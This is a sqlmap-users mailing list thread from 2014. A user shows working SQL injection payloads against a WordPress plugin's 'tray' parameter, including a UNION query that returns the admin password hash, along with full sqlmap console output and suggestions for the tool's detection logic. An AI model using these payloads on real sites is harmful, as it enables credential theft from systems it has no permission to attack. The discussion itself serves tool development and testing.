Playing with the queries sqlmap sends a bit more:
action=getMailMessage&tray=in_deleted UNION ALL SELECT NULL#&mid=1
This results in a 0 being returned where the password hash was in the
successful injection:
1[split]0[split]in_deleted UNION ALL SELECT NULL#[split]
^ injection result
action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361#&mid=1
This payload also results in a 0 being returned, not 'fdsa' as you would
expect.
However, this payload does return 'fdsa'
action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361 LIMIT
1,1#&mid=1
1[split]fdsa[split]in_deleted UNION ALL SELECT 0x66647361 LIMIT 1,1#[split]
Hope this helps.
On Mon, Dec 15, 2014 at 11:01 AM, Brandon Perry <bperry.volat...@gmail.com>
wrote:
>
> Here is the console output. Attached is the traffic log in a zip:
>
> bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5
> --risk=3 -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt
> _
> ___ ___| |_____ ___ ___ {1.0-dev-180ede0}
> |_ -| . | | | .'| . |
> |___|_ |_|_|_|_|__,| _|
> |_| |_| http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 08:56:27
>
> [08:56:27] [INFO] parsing HTTP request from '/tmp/req.req'
> [08:56:27] [INFO] setting file for logging HTTP traffic
> [08:56:27] [INFO] flushing session file
> [08:56:27] [INFO] testing connection to the target URL
> [08:56:27] [INFO] heuristics detected web page charset 'ascii'
> [08:56:27] [INFO] testing if the target URL is stable. This can take a
> couple of seconds
> [08:56:28] [INFO] target URL is stable
> [08:56:28] [WARNING] heuristic (basic) test shows that POST parameter
> 'tray' might not be injectable
> [08:56:28] [INFO] testing for SQL injection on POST parameter 'tray'
> [08:56:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> clause'
> [08:56:28] [WARNING] reflective value(s) found and filtering out
> [08:56:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> clause (MySQL comment)'
> [08:56:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> clause (Generic comment)'
> [08:56:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
> [08:57:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause
> (MySQL comment)'
> [08:57:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause
> (Generic comment)'
> [08:57:18] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING,
> ORDER BY or GROUP BY clause (RLIKE)'
> [08:57:28] [INFO] testing 'Generic boolean-based blind - Parameter replace
> (original value)'
> [08:57:28] [INFO] testing 'MySQL boolean-based blind - Parameter replace
> (MAKE_SET - original value)'
> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace
> (ELT - original value)'
> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace
> (bool*int - original value)'
> [08:57:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter
> replace (original value)'
> [08:57:29] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter
> replace (original value)'
> [08:57:29] [INFO] testing 'Generic boolean-based blind - GROUP BY and
> ORDER BY clauses'
> [08:57:30] [INFO] testing 'Generic boolean-based blind - GROUP BY and
> ORDER BY clauses (original value)'
> [08:57:30] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and
> ORDER BY clauses'
> [08:57:31] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and
> ORDER BY clauses'
> [08:57:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING
> clause'
> [08:57:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING
> clause (EXTRACTVALUE)'
> [08:57:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING
> clause (UPDATEXML)'
> [08:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE or HAVING
> clause (BIGINT UNSIGNED)'
> [08:57:45] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING
> clause'
> [08:57:48] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING
> clause'
> [08:57:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING
> clause (EXTRACTVALUE)'
> [08:57:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING
> clause (UPDATEXML)'
> [08:57:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING
> clause (BIGINT UNSIGNED)'
> [08:58:01] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING
> clause'
> [08:58:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace
> (EXTRACTVALUE)'
> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace
> (UPDATEXML)'
> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace
> (BIGINT UNSIGNED)'
> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER
> BY clauses'
> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER
> BY clauses (EXTRACTVALUE)'
> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER
> BY clauses (UPDATEXML)'
> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - GROUP BY and ORDER
> BY clauses (BIGINT UNSIGNED)'
> [08:58:08] [INFO] testing 'MySQL inline queries'
> [08:58:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
> [08:58:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
> [08:58:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
> [08:58:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
> [08:58:22] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy
> query)'
> [08:58:26] [INFO] POST parameter 'tray' seems to be 'MySQL < 5.0.12 AND
> time-based blind (heavy query)' injectable
> [08:58:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
> [08:58:26] [INFO] automatically extending ranges for UNION query injection
> technique tests as there is at least one other (potential) technique found
> [08:58:28] [INFO] target URL appears to be UNION injectable with 1 columns
> [08:58:28] [INFO] testing 'MySQL UNION query (random number) - 1 to 20
> columns'
> [08:58:29] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
> [08:58:31] [INFO] testing 'MySQL UNION query (random number) - 22 to 40
> columns'
> [08:58:32] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
> [08:58:33] [INFO] testing 'MySQL UNION query (random number) - 42 to 60
> columns'
> [08:58:35] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
> [08:58:36] [INFO] testing 'MySQL UNION query (random number) - 62 to 80
> columns'
> [08:58:38] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
> [08:58:39] [INFO] testing 'MySQL UNION query (random number) - 82 to 100
> columns'
> [08:58:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
> [08:58:42] [INFO] testing 'Generic UNION query (random number) - 1 to 20
> columns'
> [08:58:44] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
> [08:58:45] [INFO] testing 'Generic UNION query (random number) - 22 to 40
> columns'
> [08:58:46] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
> [08:58:48] [INFO] testing 'Generic UNION query (random number) - 42 to 60
> columns'
> [08:58:49] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
> [08:58:50] [INFO] testing 'Generic UNION query (random number) - 62 to 80
> columns'
> [08:58:52] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns'
> [08:58:53] [INFO] testing 'Generic UNION query (random number) - 82 to 100
> columns'
> [08:58:54] [INFO] checking if the injection point on POST parameter 'tray'
> is a false positive
> POST parameter 'tray' is vulnerable. Do you want to keep testing the
> others (if any)? [y/N] n
> sqlmap identified the following injection points with a total of 2049
> HTTP(s) requests:
> ---
> Parameter: tray (POST)
> Type: AND/OR time-based blind
> Title: MySQL < 5.0.12 AND time-based blind (heavy query)
> Payload: action=getMailMessage&tray=in_deleted AND
> 9095=BENCHMARK(5000000,MD5(0x6e434246))-- QPnA&mid=1
> ---
> [08:59:48] [INFO] testing MySQL
> [08:59:48] [WARNING] it is very important not to stress the network
> adapter during usage of time-based payloads to prevent potential errors
> do you want sqlmap to try to optimize value(s) for DBMS delay responses
> (option '--time-sec')? [Y/n]
> [08:59:51] [INFO] confirming MySQL
> [08:59:53] [INFO] adjusting time delay to 1 second due to good response
> times
> [08:59:53] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux Ubuntu
> web application technology: Apache 2.4.7, PHP 5.5.9
> back-end DBMS: MySQL >= 5.0.0
> [08:59:53] [INFO] fetched data logged to text files under
> '/home/bperry/.sqlmap/output/172.31.16.26'
>
> [*] shutting down at 08:59:53
>
> bperry@ubuntu:~/tools/sqlmap$
>
> On Mon, Dec 15, 2014 at 10:54 AM, Miroslav Stampar <
> miroslav.stam...@gmail.com> wrote:
>>
>> Hi.
>>
>> I don't see a reason why this form of UNION test would be any different
>> than the regular used by sqlmap. Can you please send me the traffic file
>> for such run (... --flush-session -t traffic.txt) along with console
>> output?
>>
>> Bye
>> On Dec 15, 2014 5:50 PM, "Brandon Perry" <bperry.volat...@gmail.com>
>> wrote:
>>
>>> Hello!
>>>
>>> Playing around with the following vulnerabivlity:
>>>
>>> http://www.exploit-db.com/exploits/35505/
>>>
>>>
>>> Using a payload such as 'action=getMailMessage&tray=in_deleted = 1 UNION
>>> (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1' does
>>> result in a response from the server with the hash of the first user:
>>>
>>> 1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION
>>> (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]
>>>
>>>
>>> However, sqlmap only finds a time based injection. Looking at sqlmap
>>> through burp, I do see sqlmap doesn't try an injection syntax like the one
>>> used in the PoC. It may be useful to add a syntax of UNION (SELECT
>>> CONCAT(blah, blah, blah) FROM blah).
>>>
>>> Just a thought!
>>>
>>>
>>> --
>>> http://volatile-minds.blogspot.com -- blog
>>> http://www.volatileminds.net -- website
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>>> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
>>> with Interactivity, Sharing, Native Excel Exports, App Integration & more
>>> Get technology previously reserved for billion-dollar corporations, FREE
>>>
>>> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sqlmap-users@lists.sourceforge.net
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>
--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
------------------------------------------------------------------------------
Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
from Actuate! Instantly Supercharge Your Business Reports and Dashboards
with Interactivity, Sharing, Native Excel Exports, App Integration & more
Get technology previously reserved for billion-dollar corporations, FREE
http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
